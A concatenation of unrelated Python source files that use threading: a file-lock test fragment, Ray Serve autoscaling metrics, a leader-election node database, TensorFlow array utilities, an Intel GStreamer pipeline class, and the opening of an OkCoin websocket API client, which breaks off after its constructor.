self.assertRaises(RuntimeError, LockedFile, *['test.txt', 'x'])
def test_readline(self):
f = LockedFile('test.txt', 'wb')
f.write(to_bytes('abc\n'))
f.write(to_bytes('123\n'))
f.close()
f = LockedFile('test.txt', 'rb')
rl = f.readline()
self.assertTrue(to_bytes('abc') in rl)
rl = f.readline()
self.assertTrue(to_bytes('123') in rl)
f.close()
f = LockedFile('test.txt', 'rb')
rls = f.readlines()
f.close()
self.assertEqual(len(rls), 2)
|
autoscaling_metrics.py
|
import threading
import bisect
from collections import defaultdict
import time
from typing import Callable, DefaultDict, Dict, List, Optional
from dataclasses import dataclass, field
import ray
def start_metrics_pusher(
interval_s: float,
collection_callback: Callable[[], Dict[str, float]],
controller_handle,
):
"""Start a background thread to push metrics to controller.
We use this background so it will be not blocked by user's code and ensure
consistently metrics delivery. Python GIL will ensure that this thread gets
fair timeshare to execute and run.
Args:
interval_s(float): the push interval.
collection_callback: a callable that returns the metric data points to
be sent to the the controller. The collection callback should take
no argument and returns a dictionary of str_key -> float_value.
controller_handle: actor handle to Serve controller.
"""
def send_once():
data = collection_callback()
# TODO(simon): maybe wait for ack or handle controller failure?
return controller_handle.record_autoscaling_metrics.remote(
data=data, send_timestamp=time.time()
)
def send_forever():
last_ref: Optional[ray.ObjectRef] = None
last_send_succeeded: bool = True
while True:
start = time.time()
if last_ref:
ready_refs, _ = ray.wait([last_ref], timeout=0)
last_send_succeeded = len(ready_refs) == 1
if last_send_succeeded:
last_ref = send_once()
duration_s = time.time() - start
remaining_time = interval_s - duration_s
if remaining_time > 0:
time.sleep(remaining_time)
timer = threading.Thread(target=send_forever)
# Making this a daemon thread so it doesn't leak upon shutdown, and it
# doesn't need to block the replica's shutdown.
timer.setDaemon(True)
timer.start()
@dataclass(order=True)
class TimeStampedValue:
timestamp: float
value: float = field(compare=False)
class InMemoryMetricsStore:
"""A very simple, in memory time series database"""
def __init__(self):
self.data: DefaultDict[str, List[TimeStampedValue]] = defaultdict(list)
def add_metrics_point(self, data_points: Dict[str, float], timestamp: float):
"""Push new data points to the store.
Args:
data_points(dict): dictionary containing the metrics values. The
key should be a string that uniquely identifies this time series
and to be used to perform aggregation.
timestamp(float): the unix epoch timestamp the metrics are
collected at.
"""
for name, value in data_points.items():
# Using in-sort to insert while maintaining sorted ordering.
bisect.insort(a=self.data[name], x=TimeStampedValue(timestamp, value))
def window_average(
self, key: str, window_start_timestamp_s: float, do_compact: bool = True
) -> Optional[float]:
"""Perform a window average operation for metric `key`
Args:
key(str): the metric name.
window_start_timestamp_s(float): the unix epoch timestamp for the
start of the window. The computed average will use all datapoints
from this timestamp until now.
do_compact(bool): whether or not to delete the datapoints that's
before `window_start_timestamp_s` to save memory. Default is
true.
Returns:
The average of all the datapoints for the key on and after time
window_start_timestamp_s, or None if there are no such points.
"""
datapoints = self.data[key]
idx = bisect.bisect(
a=datapoints,
x=TimeStampedValue(
timestamp=window_start_timestamp_s, value=0 # dummy value
),
)
points_after_idx = datapoints[idx:]
if do_compact:
self.data[key] = points_after_idx
if len(points_after_idx) == 0:
return
return sum(point.value for point in points_after_idx) / len(points_after_idx)
|
leader.py
|
'''
Leader Db File
'''
from ..utils.leader_election import Leader_Election, StoppableThread
from ..utils.logger import getLogger
from threading import Lock
from ..utils.logger import getLogger
from time import sleep
from ..utils.network import Tcp_Message
from threading import Thread
class DbLeader(Leader_Election):
def __init__(self, ip, mask, leport, logger = getLogger(), pt=10, rt=20, ttl=4):
Leader_Election.__init__(self,ip,mask,leport, logger, pt, rt, ttl)
self.database = {}
self.freelist = []
self.deadlist = []
self.main_count = 0
self.node_count = 0
self.dblock = Lock()
self.freelock = Lock()
self.deadlock = Lock()
self.dbleaderlogger = logger
def _dbleader_start(self, time):
Thread(target=self._check, args=(time), daemon=True, name="Leader Checker")
self._start()
def _check(self, time):
while(True):
if not self.im_leader:
break
lista = self.Get_Partners()
self.lelogger.debug(f'Partners {lista}')
self._check_newones(lista)
#self.lelogger.debug(f' deadones checker initated')
self._check_deadones(lista)
sleep(time)
def _check_newones(self, lista):
for i in lista:
present = False
for key in self.database:
if present:
break
for k in range(0,2):
if i == self.database[key][k]:
#self.lelogger.debug(f'IP already in database {i}')
present = True
break
if not present:
if not i in self.freelist and i != self.ip:
self.dbleaderlogger.debug(f' IP FOUND {i}')
with self.freelock:
self.freelist.append(i)
self.node_count += 1
def _check_deadones(self, lista):
with self.dblock:
for _,val in self.database.items():
for j in range(0,2):
with self.deadlock:
if val[j] and val[j] not in lista and val[j] not in self.deadlist:
self.dbleaderlogger.debug(f'IP LOST {val[j]}')
self.deadlist.append(val[j])
#region database
def _leinsert(self, ip, id = None):
if ip != self.ip:
with self.dblock:
self.node_count += 1
if id == self.main_count:
self.database[self.main_count] = (ip,None)
self.main_count += 1
return (self.main_count -1 , 0)
elif id is None:
for i in [0,1]:
for key in self.database:
if self.database[key][i] == None:
self.database[key] = self._build_tuple(key, i, ip)
return (key, i)
self.database[self.main_count] = (ip,None)
self.main_count += 1
return (self.main_count -1 , 0)
else:
for i in range(0,2):
if self.database[id][i] == None:
self.database[id] = self._build_tuple(id, i, ip)
return (id, i)
def _ledelete(self, ip):
with self.dblock:
self.node_count -= 1
for key in self.database:
for i in range(0,2):
if self.database[key][i] == ip:
self.database[key] = self._build_tuple(key,i, None)
if self.database[key] == (None,None):
del self.database[key]
if key == self.main_count -1 :
self.main_count -= 1
return (key, i)
return None
def _leget_backup(self):
with self.dblock:
for key in self.database:
if self.database[key][1] != None:
return (key, self.database[key][1])
return None
def _build_tuple(self, key, i, val, lock = False):
if key in self.database:
other = self.database[key][(i-1)%2]
tup = (other, val) if i else (val,other)
else:
tup = (val, None)
return tup
def _exist(self, ip):
with self.dblock:
for _,tup in self.database.items():
if ip in tup:
return True
return False
#endregion
|
array_utils.py
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for manipulating, storing, and loading experiment data."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import enum
import io
import threading
from absl import logging
import numpy as np
import six
from six.moves import range
import tensorflow.compat.v2 as tf
gfile = tf.io.gfile
_TFR_OPTIONS = tf.io.TFRecordOptions('GZIP')
SLICE = enum.Enum('SliceKey', ['ALL'])
def write_npz(output_dir, basename, stats_dict):
"""Write a dictionary of numpy arrays as an npz file.
Args:
output_dir: Directory for the output file.
basename: Basename for output file path.
stats_dict: Dictionary of strings to np.ndarrays.
"""
bytesio = io.BytesIO()
stats_dict = {
k: np.stack(arr) if isinstance(arr, list) else arr
for k, arr in six.iteritems(stats_dict)
}
np.savez_compressed(bytesio, **stats_dict)
path = '%s/%s' % (output_dir, basename)
logging.info('Recording stats to %s', path)
with gfile.GFile(path, 'wb') as file_handle:
file_handle.write(bytesio.getvalue())
def _dict_as_namedtuple(d):
return collections.namedtuple('tup', list(d.keys()))(**d)
def load_npz(path, as_namedtuple=False):
"""Load dictionary of arrays from an npz file.
Args:
path: File path to npz file.
as_namedtuple: If true, return the dictionary as a namedtuple.
Returns:
Dictionary (or namedtuple) of npz file contents.
"""
with gfile.GFile(path) as fl:
bytesio = io.BytesIO(fl.read())
out = dict(np.load(bytesio))
return _dict_as_namedtuple(out) if as_namedtuple else out
def stats_dict_to_tfexample(stats):
"""Converts a dictionary of numpy arrays to a tf.Example proto."""
example = tf.train.Example()
fm = example.features.feature
for key, arr in six.iteritems(stats):
arr = np.array(arr)
if key.endswith('/shape'):
raise ValueError('Invalid key: %s' % key)
if arr.dtype in (np.float32, np.float64):
fm[key].float_list.value.extend(arr.reshape([-1]))
fm[key + '/shape'].int64_list.value.extend(arr.shape)
elif arr.dtype in (np.int32, np.int64):
fm[key].int64_list.value.extend(arr.reshape([-1]))
fm[key + '/shape'].int64_list.value.extend(arr.shape)
else:
raise NotImplementedError('Unsupported array type %s for key=%s'
% (type(arr), key))
return example
def tfexample_to_stats_dict(example):
"""Converts a tf.Example proto into a dictionary of numpy arrays."""
out = {}
fm = example.features.feature
for key, value in six.iteritems(fm):
if key.endswith('/shape'):
continue
arr = (value.int64_list.value or
value.float_list.value or
value.bytes_list.value)
shape = fm[key + '/shape'].int64_list.value
out[key] = np.array(arr).reshape(shape)
return out
def load_stats_from_tfrecords(path, max_records=None, as_namedtuple=False,
gzip=False):
"""Loads data from a TFRecord table into a dictionary of np arrays.
Args:
path: Path to TFRecord file.
max_records: Maximum number of records to read.
as_namedtuple: If true, return the stats-dictionary as a namedtuple.
gzip: Whether to use gzip compression.
Returns:
Dictionary (or namedtuple) of numpy arrays.
"""
out = collections.defaultdict(list)
if tf.executing_eagerly():
itr = tf.data.TFRecordDataset(
path, compression_type='GZIP' if gzip else None)
parse_record = lambda x: tf.train.Example.FromString(x.numpy())
else:
tfr_options = _TFR_OPTIONS if gzip else None
itr = tf.compat.v1.python_io.tf_record_iterator(path, tfr_options)
parse_record = tf.train.Example.FromString
for i, rec in enumerate(itr):
if max_records and i >= max_records:
break
example = parse_record(rec)
stats = tfexample_to_stats_dict(example)
for key, array in six.iteritems(stats):
out[key].append(array)
out = {k: np.stack(arr) for k, arr in six.iteritems(out)}
return _dict_as_namedtuple(out) if as_namedtuple else out
class StatsWriter(object):
"""Simple wrapper class to record stats-dictionaries in TFRecord tables."""
def __init__(self, path, gzip=False):
self._writer = tf.io.TFRecordWriter(path, _TFR_OPTIONS if gzip else None)
def write(self, stats):
tfexample = stats_dict_to_tfexample(stats)
self._writer.write(tfexample.SerializeToString())
def write_batch(self, stats_batch):
batch_size, = set(len(x) for x in six.itervalues(stats_batch))
for i in range(batch_size):
stats_i = {k: v[i] for k, v in six.iteritems(stats_batch)}
tfexample = stats_dict_to_tfexample(stats_i)
self._writer.write(tfexample.SerializeToString())
def __del__(self):
self._writer.flush()
self._writer.close()
def slice_structure(struct, keys):
"""Generalized (but limited) slice function on nested structures.
This function offers limited numpy-style array slicing on nested structures
of maps, lists, tuples, and arrays. Specifically, by assuming similar
structures along each dictionary / list / tuple value, we can support
select-all and index-list slicing (e.g. x[3, :, 1] or x[3, indices, 1]).
For example,
x = {'a': [1, 2], 'b': [3, 4], 'c': [5, 6]}
slice_structure(x, [SLICE.ALL, 0])
will yield `{'a': 1, 'b': 3, 'c': 5}`
and
slice_structure(x, [['a', 'c', 'b'], 0])
yields `[1, 5, 3]`.
Args:
struct: Nested structure of dictionaries, lists, tuples, numpy arrays.
keys: List of keys to apply at each successive depth;
SLICE.ALL gathers all items.
Returns:
Nested structure with specified slices applied.
Note: Structure elments are not necessarily copied in the process.
"""
if not keys:
return struct
if keys[0] is SLICE.ALL:
if isinstance(struct, dict):
return {k: slice_structure(v, keys[1:]) for k, v in struct.items()}
elif isinstance(struct, (list, tuple)):
return type(struct)([slice_structure(struct_i, keys[1:])
for struct_i in struct])
else:
raise NotImplementedError('Unsupported type for ALL: %s.' % type(struct))
# List-of-indices slicing.
elif isinstance(keys[0], list):
return [slice_structure(struct[k], keys[1:]) for k in keys[0]]
# Simple get-element-at-index case.
else:
return slice_structure(struct[keys[0]], keys[1:])
class _MapResult(object):
"""Simple temporary container for threaded_map_structure() results.
Note: We can't use a simple Python list (or other builtin mutable container)
for this since tf.nest.map_structure will traverse the list and operate on
its elements.
Attributes:
result: Equals None before calling the map-function;
assigned to the function output afterwards.
"""
def __init__(self):
self.result = None
def assign(self, x):
"""Assigns a value to a container attribute for later retrieval."""
self.result = x
def threaded_map_structure(fn, *args):
"""Executes tf.nest.map_structure with parallel threads for each map call.
Primarily useful for slow, non-compute functions (e.g. loading data from CNS).
See tf.nest.map_structure for details.
Args:
fn: Function to map across leaf nodes in args structure.
*args: Nested structures of arguments to map over.
Returns:
Parallel structure to the one in args with map results.
"""
fn_nooutput = lambda result, *args_: result.assign(fn(*args_))
def make_thread_fn(result, *args_):
return threading.Thread(target=fn_nooutput, args=(result,) + args_)
outputs = tf.nest.map_structure(lambda *_: _MapResult(), *args)
threads = tf.nest.map_structure(make_thread_fn, outputs, *args)
tf.nest.map_structure(lambda t: t.start(), threads)
tf.nest.map_structure(lambda t: t.join(), threads)
return tf.nest.map_structure(lambda x: x.result, outputs)
|
gstreamer_pipeline.py
|
'''
* Copyright (C) 2019-2020 Intel Corporation.
*
* SPDX-License-Identifier: BSD-3-Clause
'''
import copy
import json
import os
import string
import time
from threading import Lock, Thread
import gi
gi.require_version('Gst', '1.0')
gi.require_version('GstApp', '1.0')
# pylint: disable=wrong-import-position
from gi.repository import GLib, Gst, GstApp # pylint: disable=unused-import
from gstgva.util import GVAJSONMeta
from vaserving.app_destination import AppDestination
from vaserving.app_source import AppSource
from vaserving.common.utils import logging
from vaserving.pipeline import Pipeline
# pylint: enable=wrong-import-position
logger = logging.get_logger('GSTPipeline', is_static=True)
class GStreamerPipeline(Pipeline):
Gst.init(None)
GVA_INFERENCE_ELEMENT_TYPES = ["GstGvaDetect",
"GstGvaClassify",
"GstGvaInference",
"GvaAudioDetect"]
_inference_element_cache = {}
_mainloop = None
_mainloop_thread = None
@staticmethod
def gobject_mainloop():
gi.require_version('Gst', '1.0')
from gi.repository import GLib
GStreamerPipeline._mainloop = GLib.MainLoop.new(None, False)
try:
GStreamerPipeline._mainloop.run()
except (KeyboardInterrupt, SystemExit):
pass
def __init__(self, identifier, config, model_manager, request, finished_callback):
# TODO: refactor as abstract interface
# pylint: disable=super-init-not-called
self.config = config
self.identifier = identifier
self.pipeline = None
self.template = config['template']
self.models = model_manager.models
self.model_manager = model_manager
self.request = request
self.state = Pipeline.State.QUEUED
self.frame_count = 0
self.start_time = None
self.stop_time = None
self.avg_fps = 0
self._gst_launch_string = None
self.latency_times = dict()
self.sum_pipeline_latency = 0
self.count_pipeline_latency = 0
self._real_base = None
self._stream_base = None
self._year_base = None
self._month_base = None
self._day_base = None
self._dir_name = None
self._bus_connection_id = None
self._create_delete_lock = Lock()
self._finished_callback = finished_callback
self._bus_messages = False
self.appsrc_element = None
self._app_source = None
self.appsink_element = None
self._app_destination = None
if (not GStreamerPipeline._mainloop):
GStreamerPipeline._mainloop_thread = Thread(
target=GStreamerPipeline.gobject_mainloop)
GStreamerPipeline._mainloop_thread.daemon = True
GStreamerPipeline._mainloop_thread.start()
@staticmethod
def mainloop_quit():
if (GStreamerPipeline._mainloop):
GStreamerPipeline._mainloop.quit()
GStreamerPipeline._mainloop = None
if (GStreamerPipeline._mainloop_thread):
GStreamerPipeline._mainloop_thread = None
def _delete_pipeline(self, new_state):
self.state = new_state
self.stop_time = time.time()
logger.debug("Setting Pipeline {id}"
" State to {next_state}".format(id=self.identifier,
next_state=new_state.name))
if self.pipeline:
bus = self.pipeline.get_bus()
if self._bus_connection_id:
bus.remove_signal_watch()
bus.disconnect(self._bus_connection_id)
self._bus_connection_id = None
self.pipeline.set_state(Gst.State.NULL)
del self.pipeline
self.pipeline = None
if self._app_source:
self._app_source.finish()
if self._app_destination:
self._app_destination.finish()
self._finished_callback()
def _delete_pipeline_with_lock(self, new_state):
with(self._create_delete_lock):
self._delete_pipeline(new_state)
def stop(self):
with(self._create_delete_lock):
if not self.state.stopped():
if (self.pipeline):
structure = Gst.Structure.new_empty(self.state.name)
message = Gst.Message.new_custom(
Gst.MessageType.APPLICATION, None, structure)
self.pipeline.get_bus().post(message)
else:
self.state = Pipeline.State.ABORTED
return self.status()
def params(self):
# TODO: refactor
# pylint: disable=R0801
request = copy.deepcopy(self.request)
if "models" in request:
del request["models"]
params_obj = {
"id": self.identifier,
"request": request,
"type": self.config["type"],
"launch_command": self._gst_launch_string
}
return params_obj
def status(self):
logger.debug("Called Status")
if self.start_time is not None:
if self.stop_time is not None:
elapsed_time = max(0, self.stop_time - self.start_time)
else:
elapsed_time = max(0, time.time() - self.start_time)
else:
elapsed_time = None
status_obj = {
"id": self.identifier,
"state": self.state,
"avg_fps": self.avg_fps,
"start_time": self.start_time,
"elapsed_time": elapsed_time
}
if self.count_pipeline_latency != 0:
status_obj["avg_pipeline_latency"] = self.sum_pipeline_latency / \
self.count_pipeline_latency
return status_obj
def get_avg_fps(self):
return self.avg_fps
def _get_element_property(self, element, key):
if isinstance(element, str):
return (element, key, None)
if isinstance(element, dict):
return (element["name"], element["property"], element.get("format", None))
return None
def _set_bus_messages_flag(self):
request_parameters, config_parameters = Pipeline.get_section_and_config(
self.request, self.config, ["parameters"],
["parameters", "properties"])
bus_msgs = "bus-messages"
if bus_msgs in config_parameters and bus_msgs in request_parameters and \
isinstance(request_parameters[bus_msgs], bool):
self._bus_messages = request_parameters[bus_msgs]
def _set_section_properties(self, request_section, config_section):
# TODO: refactor
# pylint: disable=R1702
request, config = Pipeline.get_section_and_config(
self.request, self.config, request_section, config_section)
for key in config:
if isinstance(config[key], dict) and "element" in config[key]:
if key in request:
if isinstance(config[key]["element"], list):
element_properties = [self._get_element_property(
x, key) for x in config[key]["element"]]
else:
element_properties = [self._get_element_property(
config[key]["element"], key)]
for element_name, property_name, format_type in element_properties:
element = self.pipeline.get_by_name(element_name)
if element:
if (property_name in [x.name for x in element.list_properties()]):
if (format_type == "json"):
element.set_property(
property_name, json.dumps(request[key]))
else:
element.set_property(
property_name, request[key])
logger.debug("Setting element: {}, property: {}, value: {}".format(
element_name,
property_name,
element.get_property(property_name)))
else:
logger.debug("Parameter {} given for element {}"
" but no property found".format(
property_name, element_name))
else:
logger.debug(
"Parameter {} given for element {}"
" but no element found".format(property_name, element_name))
def _cache_inference_elements(self):
model_instance_id = "model-instance-id"
gva_elements = [(element, element.__gtype__.name + '_'
+ element.get_property(model_instance_id))
for element in self.pipeline.iterate_elements()
if (element.__gtype__.name in self.GVA_INFERENCE_ELEMENT_TYPES
and model_instance_id in [x.name for x in element.list_properties()]
and element.get_property(model_instance_id))]
for element, key in gva_elements:
if key not in GStreamerPipeline._inference_element_cache:
GStreamerPipeline._inference_element_cache[key] = element
def _set_default_models(self):
gva_elements = [element for element in self.pipeline.iterate_elements() if (
element.__gtype__.name in self.GVA_INFERENCE_ELEMENT_TYPES and
"VA_DEVICE_DEFAULT" in element.get_property("model"))]
for element in gva_elements:
network = self.model_manager.get_default_network_for_device(
element.get_property("device"), element.get_property("model"))
logger.debug("Setting model to {} for element {}".format(
network, element.get_name()))
element.set_property("model", network)
@staticmethod
def _get_elements_by_type(pipeline, type_strings):
return [element for element in pipeline.iterate_elements()
if element.__gtype__.name in type_strings]
@staticmethod
def validate_config(config):
template = config["template"]
pipeline = Gst.parse_launch(template)
appsink_elements = GStreamerPipeline._get_elements_by_type(pipeline, ["GstAppSink"])
metaconvert = pipeline.get_by_name("metaconvert")
metapublish = pipeline.get_by_name("destination")
appsrc_elements = GStreamerPipeline._get_elements_by_type(pipeline, ["GstAppSrc"])
if (len(appsrc_elements) > 1):
logger.warning("Multiple appsrc elements found")
if len(appsink_elements) != 1:
logger.warning("Missing or multiple appsink elements")
if metaconvert is None:
logger.warning("Missing metaconvert element")
if metapublish is None:
logger.warning("Missing metapublish element")
def calculate_times(self, sample):
buffer = sample.get_buffer()
segment = sample.get_segment()
times = {}
times['segment.time'] = segment.time
times['stream_time'] = segment.to_stream_time(
Gst.Format.TIME, buffer.pts)
return times
def format_location_callback(self,
unused_element,
unused_fragement_id,
sample,
unused_data=None):
times = self.calculate_times(sample)
if (self._real_base is None):
clock = Gst.SystemClock(clock_type=Gst.ClockType.REALTIME)
self._real_base = clock.get_time()
self._stream_base = times["segment.time"]
metaconvert = self.pipeline.get_by_name("metaconvert")
if metaconvert:
if ("tags" not in self.request):
self.request["tags"] = {}
self.request["tags"]["real_base"] = self._real_base
metaconvert.set_property(
"tags", json.dumps(self.request["tags"]))
adjusted_time = self._real_base + \
(times["stream_time"] - self._stream_base)
self._year_base = time.strftime(
"%Y", time.localtime(adjusted_time / 1000000000))
self._month_base = time.strftime(
"%m", time.localtime(adjusted_time / 1000000000))
self._day_base = time.strftime(
"%d", time.localtime(adjusted_time / 1000000000))
template = "{prefix}/{yearbase}/{monthbase}/{daybase}"
self._dir_name = template.format(prefix=self.request["parameters"]["recording_prefix"],
yearbase=self._year_base,
monthbase=self._month_base, daybase=self._day_base)
try:
os.makedirs(self._dir_name)
except FileExistsError:
logger.debug("Directory already exists")
template = "{dirname}/{adjustedtime}_{time}.mp4"
return template.format(dirname=self._dir_name,
adjustedtime=adjusted_time,
time=times["stream_time"] - self._stream_base)
def _set_properties(self):
self._set_section_properties(["parameters"],
["parameters", "properties"])
self._set_section_properties(["destination"],
["destination", "properties"])
if "destination" in self.request and "type" in self.request["destination"]:
self._set_section_properties(["destination"],
["destination",
self.request["destination"]["type"], "properties"])
self._set_section_properties(["source"],
["source", "properties"])
if "source" in self.request and "type" in self.request["source"]:
self._set_section_properties(["source"],
["source", self.request["source"]["type"], "properties"])
self._set_section_properties([], [])
def _get_any_source(self):
src = self.pipeline.get_by_name("source")
if (not src):
for src in self.pipeline.iterate_sources():
break
return src
def start(self):
self.request["models"] = self.models
self._gst_launch_string = string.Formatter().vformat(
self.template, [], self.request)
with(self._create_delete_lock):
if (self.start_time is not None):
return
logger.debug("Starting Pipeline {id}".format(id=self.identifier))
logger.debug(self._gst_launch_string)
try:
self.pipeline = Gst.parse_launch(self._gst_launch_string)
self._set_properties()
self._set_bus_messages_flag()
self._set_default_models()
self._cache_inference_elements()
src = self._get_any_source()
sink = self.pipeline.get_by_name("appsink")
if (not sink):
sink = self.pipeline.get_by_name("sink")
if src and sink:
src_pad = src.get_static_pad("src")
if (src_pad):
src_pad.add_probe(Gst.PadProbeType.BUFFER,
GStreamerPipeline.source_probe_callback, self)
else:
src.connect(
"pad-added", GStreamerPipeline.source_pad_added_callback, self)
sink_pad = sink.get_static_pad("sink")
sink_pad.add_probe(Gst.PadProbeType.BUFFER,
GStreamerPipeline.appsink_probe_callback, self)
bus = self.pipeline.get_bus()
bus.add_signal_watch()
self._bus_connection_id = bus.connect("message", self.bus_call)
splitmuxsink = self.pipeline.get_by_name("splitmuxsink")
self._real_base = None
if (not splitmuxsink is None):
splitmuxsink.connect("format-location-full",
self.format_location_callback,
None)
self._set_application_source()
self._set_application_destination()
self.pipeline.set_state(Gst.State.PLAYING)
self.start_time = time.time()
except Exception as error:
logger.error("Error on Pipeline {id}: {err}".format(
id=self.identifier, err=error))
# Context is already within _create_delete_lock
self._delete_pipeline(Pipeline.State.ERROR)
def _set_application_destination(self):
self._app_destination = None
self.appsink_element = None
app_sink_elements = GStreamerPipeline._get_elements_by_type(self.pipeline, ["GstAppSink"])
if (app_sink_elements):
self.appsink_element = app_sink_elements[0]
if "destination" in self.request and self.request["destination"]["type"] == "application":
self._app_destination = AppDestination.create_app_destination(self.request, self)
if ((not self._app_destination) or (not self.appsink_element)
or (not self.appsink_element.name == "destination")):
raise Exception("Unsupported Application Destination: {}".format(
self.request["destination"]["class"]))
if self.appsink_element is not None:
self.appsink_element.set_property("emit-signals", True)
self.appsink_element.set_property('sync', False)
self.avg_fps = 0
if (self._app_destination):
self.appsink_element.connect("new-sample", self.on_sample_app_destination)
else:
self.appsink_element.connect("new-sample", self.on_sample)
def on_need_data_app_source(self, src, _):
try:
self._app_source.start_frames()
except Exception as error:
logger.error("Error on Pipeline {id}: Error in App Source: {err}".format(
id=self.identifier, err=error))
src.post_message(Gst.Message.new_error(src, GLib.GError(),
"AppSource: {}".format(str(error))))
def on_enough_data_app_source(self, src):
try:
self._app_source.pause_frames()
except Exception as error:
logger.error("Error on Pipeline {id}: Error in App Source: {err}".format(
id=self.identifier, err=error))
src.post_message(Gst.Message.new_error(src, GLib.GError(),
"AppSource: {}".format(str(error))))
def _set_application_source(self):
self._app_source = None
self.appsrc_element = None
if self.request["source"]["type"] == "application":
appsrc_element = self.pipeline.get_by_name("source")
if (appsrc_element) and (appsrc_element.__gtype__.name == "GstAppSrc"):
self.appsrc_element = appsrc_element
self._app_source = AppSource.create_app_source(self.request, self)
if (not self._app_source) or (not self.appsrc_element):
raise Exception("Unsupported Application Source: {}".format(
self.request["source"]["class"]))
self.appsrc_element.set_property("format", Gst.Format.TIME)
self.appsrc_element.set_property("block", True)
self.appsrc_element.set_property("do-timestamp", True)
self.appsrc_element.set_property("is-live", True)
self.appsrc_element.set_property("emit-signals", True)
self.appsrc_element.connect('need-data', self.on_need_data_app_source)
self.appsrc_element.connect('enough-data', self.on_enough_data_app_source)
@staticmethod
def source_pad_added_callback(unused_element, pad, self):
pad.add_probe(Gst.PadProbeType.BUFFER,
GStreamerPipeline.source_probe_callback, self)
return Gst.FlowReturn.OK
@staticmethod
def source_probe_callback(unused_pad, info, self):
buffer = info.get_buffer()
pts = buffer.pts
self.latency_times[pts] = time.time()
return Gst.PadProbeReturn.OK
@staticmethod
def appsink_probe_callback(unused_pad, info, self):
buffer = info.get_buffer()
pts = buffer.pts
source_time = self.latency_times.pop(pts, -1)
if source_time != -1:
self.sum_pipeline_latency += time.time() - source_time
self.count_pipeline_latency += 1
return Gst.PadProbeReturn.OK
def on_sample_app_destination(self, sink):
logger.debug("Received Sample from Pipeline {id}".format(
id=self.identifier))
sample = sink.emit("pull-sample")
result = Gst.FlowReturn.OK
try:
self._app_destination.process_frame(sample)
except Exception as error:
logger.error("Error on Pipeline {id}: Error in App Destination: {err}".format(
id=self.identifier, err=error))
result = Gst.FlowReturn.ERROR
self.frame_count += 1
self.avg_fps = self.frame_count / (time.time() - self.start_time)
return result
def on_sample(self, sink):
logger.debug("Received Sample from Pipeline {id}".format(
id=self.identifier))
sample = sink.emit("pull-sample")
try:
buf = sample.get_buffer()
for meta in GVAJSONMeta.iterate(buf):
json_object = json.loads(meta.get_message())
logger.debug(json.dumps(json_object))
except Exception as error:
logger.error("Error on Pipeline {id}: {err}".format(
id=self.identifier, err=error))
self.frame_count += 1
self.avg_fps = self.frame_count / (time.time() - self.start_time)
return Gst.FlowReturn.OK
def bus_call(self, unused_bus, message, unused_data=None):
message_type = message.type
if message_type == Gst.MessageType.APPLICATION:
logger.info("Pipeline {id} Aborted".format(id=self.identifier))
self._delete_pipeline_with_lock(Pipeline.State.ABORTED)
if message_type == Gst.MessageType.EOS:
logger.info("Pipeline {id} Ended".format(id=self.identifier))
self._delete_pipeline_with_lock(Pipeline.State.COMPLETED)
elif message_type == Gst.MessageType.ERROR:
err, debug = message.parse_error()
logger.error(
"Error on Pipeline {id}: {err}: {debug}".format(id=self.identifier,
err=err,
debug=debug))
self._delete_pipeline_with_lock(Pipeline.State.ERROR)
elif message_type == Gst.MessageType.STATE_CHANGED:
old_state, new_state, unused_pending_state = message.parse_state_changed()
if message.src == self.pipeline:
if old_state == Gst.State.PAUSED and new_state == Gst.State.PLAYING:
if self.state is Pipeline.State.ABORTED:
self._delete_pipeline_with_lock(Pipeline.State.ABORTED)
if self.state is Pipeline.State.QUEUED:
logger.info(
"Setting Pipeline {id} State to RUNNING".format(id=self.identifier))
self.state = Pipeline.State.RUNNING
else:
if self._bus_messages:
structure = Gst.Message.get_structure(message)
if structure:
logger.info("Message header: {name} , Message: {message}".format(
name=Gst.Structure.get_name(structure),
message=Gst.Structure.to_string(structure)))
return True
|
vnokcoin.py
|
# encoding: UTF-8
import hashlib
import zlib
import json
from time import sleep
from threading import Thread
import websocket
# OKCOIN网站
OKCOIN_CNY = 'wss://real.okcoin.cn:10440/websocket/okcoinapi'
OKCOIN_USD = 'wss://real.okcoin.com:10440/websocket/okcoinapi'
# 账户货币代码
CURRENCY_CNY = 'cny'
CURRENCY_USD = 'usd'
# 电子货币代码
SYMBOL_BTC = 'btc'
SYMBOL_LTC = 'ltc'
SYMBOL_ETH = 'eth'
# 行情深度
DEPTH_20 = 20
DEPTH_60 = 60
# K线时间区间
INTERVAL_1M = '1min'
INTERVAL_3M = '3min'
INTERVAL_5M = '5min'
INTERVAL_15M = '15min'
INTERVAL_30M = '30min'
INTERVAL_1H = '1hour'
INTERVAL_2H = '2hour'
INTERVAL_4H = '4hour'
INTERVAL_6H = '6hour'
INTERVAL_1D = 'day'
INTERVAL_3D = '3day'
INTERVAL_1W = 'week'
# 交易代码,需要后缀货币名才能完整
TRADING_SYMBOL_BTC = 'btc_'
TRADING_SYMBOL_LTC = 'ltc_'
TRADING_SYMBOL_ETH = 'eth_'
# 委托类型
TYPE_BUY = 'buy'
TYPE_SELL = 'sell'
TYPE_BUY_MARKET = 'buy_market'
TYPE_SELL_MARKET = 'sell_market'
# 期货合约到期类型
FUTURE_EXPIRY_THIS_WEEK = 'this_week'
FUTURE_EXPIRY_NEXT_WEEK = 'next_week'
FUTURE_EXPIRY_QUARTER = 'quarter'
# 期货委托类型
FUTURE_TYPE_LONG = 1
FUTURE_TYPE_SHORT = 2
FUTURE_TYPE_SELL = 3
FUTURE_TYPE_COVER = 4
# 期货是否用现价
FUTURE_ORDER_MARKET = 1
FUTURE_ORDER_LIMIT = 0
# 期货杠杆
FUTURE_LEVERAGE_10 = 10
FUTURE_LEVERAGE_20 = 20
# 委托状态
ORDER_STATUS_NOTTRADED = 0
ORDER_STATUS_PARTTRADED = 1
ORDER_STATUS_ALLTRADED = 2
ORDER_STATUS_CANCELLED = -1
ORDER_STATUS_CANCELLING = 4
########################################################################
class OkCoinApi(object):
"""基于Websocket的API对象"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.apiKey = '' # 用户名
self.secretKey = '' # 密码
self.host = '' # 服务器地址
self.currency = '' # 货币类型(usd或者cny)
self.ws = None # websocket应用对象
self.thread = None # 工作线程
